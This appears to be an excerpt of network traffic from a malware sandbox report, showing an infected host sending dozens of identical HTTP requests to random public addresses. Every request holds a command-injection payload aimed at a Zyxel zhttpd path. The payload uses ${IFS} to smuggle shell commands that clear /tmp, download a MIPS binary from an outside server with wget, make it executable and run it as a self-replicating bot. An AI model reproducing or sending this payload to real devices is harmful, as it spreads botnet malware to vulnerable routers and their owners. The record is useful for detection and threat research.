                                                        Jan 28, 2024 10:12:58.519820929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5972192.168.2.1443340205.89.94.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519865990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5973192.168.2.1457842115.122.241.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519896030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5974192.168.2.1460048211.195.32.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519931078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5975192.168.2.145440076.250.131.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519989014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5976192.168.2.1434680137.170.42.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.520040989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5977192.168.2.1459804112.88.196.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.520054102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5978192.168.2.145389893.137.215.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531275988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5979192.168.2.1448458181.118.78.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531310081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5980192.168.2.145817253.197.137.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531341076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5981192.168.2.143875873.101.99.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531379938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5982192.168.2.144024612.163.234.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531435013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5983192.168.2.1434702157.44.100.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531483889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5984192.168.2.1451906139.231.247.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531523943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5985192.168.2.1453584187.250.232.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531578064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5986192.168.2.1448876198.195.209.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531620979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5987192.168.2.1450070125.108.109.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531636953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5988192.168.2.143636079.27.141.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531683922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5989192.168.2.144720477.95.20.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531697989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5990192.168.2.1433572151.160.241.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531742096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5991192.168.2.1444304105.254.6.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531760931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5992192.168.2.145373219.44.236.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531810045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5993192.168.2.1456472124.167.106.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531842947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5994192.168.2.145622838.178.162.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531884909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5995192.168.2.1446908208.62.208.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531925917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5996192.168.2.1438722111.52.200.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531961918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5997192.168.2.1448070173.222.124.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.531997919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5998192.168.2.1443708176.20.49.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532027006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5999192.168.2.1432936142.58.197.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532083035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6000192.168.2.1455286167.191.247.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532104969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6001192.168.2.143950475.153.142.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532157898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6002192.168.2.1449690103.124.142.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532186031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6003192.168.2.144190617.41.10.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532210112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6004192.168.2.144232860.203.34.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532259941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6005192.168.2.145207666.234.1.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532275915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6006192.168.2.144191659.69.9.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532321930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6007192.168.2.1434664133.21.213.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532347918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6008192.168.2.1449492156.97.218.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532409906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6009192.168.2.1441764210.152.227.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532455921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6010192.168.2.1460886159.126.28.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532488108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6011192.168.2.1444786117.247.154.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532519102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6012192.168.2.1434486132.92.131.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532572985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6013192.168.2.144102873.29.129.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532625914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6014192.168.2.1438568170.210.238.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532668114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6015192.168.2.1438754110.193.146.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532696009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6016192.168.2.1442980155.27.163.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532708883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6017192.168.2.145953474.209.176.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532763004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6018192.168.2.1454032123.39.104.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532823086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6019192.168.2.1433220154.234.95.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532861948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6020192.168.2.1451298121.188.178.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532891989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6021192.168.2.146037447.192.62.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532937050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6022192.168.2.145702676.64.49.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.532964945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6023192.168.2.144794071.10.59.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533009052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6024192.168.2.1455132137.110.126.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533066988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6025192.168.2.145276889.220.87.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533118963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6026192.168.2.1451648219.181.204.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533163071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6027192.168.2.144711253.253.57.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533164024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6028192.168.2.1442232169.27.170.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533175945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6029192.168.2.145743818.51.54.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533227921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6030192.168.2.1436016177.216.30.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533277988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6031192.168.2.1444458203.169.253.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533333063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6032192.168.2.143593868.44.177.50443
                                                        TimestampBytes transferredDirectionData
